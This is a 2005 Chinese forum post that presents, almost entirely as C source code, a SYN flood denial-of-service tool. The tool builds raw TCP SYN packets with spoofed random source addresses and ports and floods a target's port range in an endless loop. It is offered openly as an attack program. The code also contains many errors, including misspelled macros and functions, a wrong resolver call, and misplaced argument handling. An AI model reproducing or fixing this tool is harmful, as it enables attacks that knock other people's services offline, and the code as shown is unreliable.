- 注册时间
- 2004-8-30
- 最后登录
- 1970-1-1
|
发表于 2005-2-6 22:24:00
|
显示全部楼层
下面是SYN FLOOD攻击的C语言程序
#include "stdio.h"
#include "stdlib.h"
#include "unistd.h"
#include "time.h"
#include "strings.h"
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in_systm.h"
#include "netinet/in.h"
#include "netinet/ip.h"
#include "netinet/tcp.h"
#include "arpa/inet.h"
#include "netdb.h"
#include "limits.h"
#define BLEH(n) htons(n)
#define PACKETSIZE (sizeof(struct ip)+sizeof(struct tcphdr))
struct ip *ip;
struct tcphdr *tcp;
struct sockaddr_in s_in;
u_char packet[PACHETSIZE];
int get;
u_long source,target;
void usage(char *name)
{
printf("\nUsage:%s <source addr> <destination> <lowport> <highport>\n",name);
printf("if source=0,source address will be random\n\n");
exit(1);
}
/*这里为了得到一个IP地址,专门写了一个函数*/
u_long getaddr(char *hostname)
{
struct hostent *hp;
if((hp=gethostname(hostname))==NULL)
{
fprintf(stderr,"could not resolve %s.\n",hostname);
exit(1);
}
return *(u_long *)hp->h_addr;
}
u_short in_cksum(u_short *addr,int len)
{
register int nleft =len;
register u_short *w=addr;
register int sum=0;
u_short answer=0;
while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if(nleft==1)
{
*(u_char *)(&answer)=*(u_char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return (answer);
}
/* 下面是重点--构造攻击包*/
void makepacket(void)
{
memset(packet,0,PACKETSIZE);
ip=(struct ip *)packet;
tcp=(struct tcphdr*)(packet+sizeof(struct ip));
ip->ip_hl=5;
ip->ip_v=4;
ip->ip_tos=0;
ip->ip_len=BLEN(PACKETSIZE);
ip->ip_off=0;
ip->ip_ttl=40;
ip->ip_p=IPPROTO_TCP;
ip->ip_dst.s_addr=target;
tcp->th_flags=TH_SYN;//设置了SYN位
tcp->th_win=htons(0xffff);
s_in.sin_family=AF_INET;
s_in.sin_addr.s_addr=target;
}
void kill(u_int dstport)
{
if(source==0)
ip->ip_src.s_addr=random();
else
ip->ip_src.s_addr=source;
ip->ip_id=random();
tcp->th_sport=random();//伪造源端口随机产生
tcp->th_dport=htons(dstport);
tcp->th_seq=random();
tcp->th_ack=random();//结合顶楼的知识,这两行知道怎么回事了吧?嘿嘿
tcp->th_sum=in_cksum((u_short*)tcp,sizeof(struct tcphdr));
ip->ip_sum=in_cksum((u_short*)packet,PACKETSIZE);
s_in.sin_port=htons(dstport);
sendto(get,packet,PACKETSIZE,0,(struct sockaddr *)&s_in,sizeof(s_in));
}
int main(int argc,char *argv[])
{
int low,high,port;
if((get=socket(AF_INET,SOCK_RAW,IPPRPTP_RAW))<0)
{
perror("socket");
exit(1);
if((argc<5)||(argc>6))
usage(argv[0]);
printf("\nflooding target. control-c to terminate\n",target);
fflush(stdout);
if(atoi(argv[1]==0))
source=0;
else
source=getaddr(argv[1]);
target=gataddr(argv[2]);
low=atoi(argv[3]);
high=atoi(argv[4]);
if(low>high)
{
printf("low>high\n");
exit(1);
}
if(low==high)
{
makepacket();
for(;;)
{
srandom(time(NULL));
port==low;
kill(port);
}
return 0;
}
makepacket();
for(;;)
{
srandom(time(NULL));
for(port=low;port<=high;port++)
kill(port);
}
return 0;
}
}
|
|